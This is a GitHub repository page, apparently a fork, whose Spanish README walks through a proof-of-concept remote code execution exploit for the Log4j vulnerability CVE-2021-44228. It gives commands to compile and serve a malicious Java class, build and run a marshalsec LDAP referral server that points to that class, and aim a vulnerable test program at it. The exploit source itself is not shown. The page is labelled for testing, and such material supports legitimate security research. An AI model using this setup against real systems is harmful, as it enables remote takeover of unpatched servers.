Skip to content

Grupo-Kapa-7/CVE-2021-44228-Log4j-PoC-RCE

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

3 Commits
src/main/java
src/main/java
 
 
target/classes
target/classes
 
 
.gitignore
.gitignore
 
 
README.md
README.md
 
 
pom.xml
pom.xml
 
 

Repository files navigation

Apache Log4j CVE-2021-44228 GK7 PoC

Pasos

  1. Compilar Log4jRCE.java y mover el archivo .class a un servidor web (ej: PHP local)

    1. cd src/main/java
    2. javac Log4jRCE.java
    3. Mover archivo .class a server web o iniciar localmente un php, por ejempl : php -S 127.0.0.1:8888

  2. Iniciar LDAP Server

    1. git clone [email protected]:Grupo-Kapa-7/marshalsec.git
    2. cd marshalsec
    3. mvn clean package -DskipTests
    4. start ldap server java -cp target/marshalsec-0.0.3-SNAPSHOT-GK7Threats-all.jar marshalsec.jndi.LDAPRefServer "http://127.0.0.1:8888/#Log4jRCE"

  3. Para proabr la PoC, modificar el archivo src/main/java/log4j.java y cambiar el URL del servidor LDAP a su gusto.

Repo Original

https://github.com/tangxiaofeng7/CVE-2021-44228-Apache-Log4j-Rce

About

PoC RCE Log4j CVE-2021-4428 para pruebas

Resources

Readme
Activity
Custom properties

Stars

0 stars

Watchers

0 watching

Forks

1 fork
Report repository

Releases

No releases published

Packages

No packages published

Languages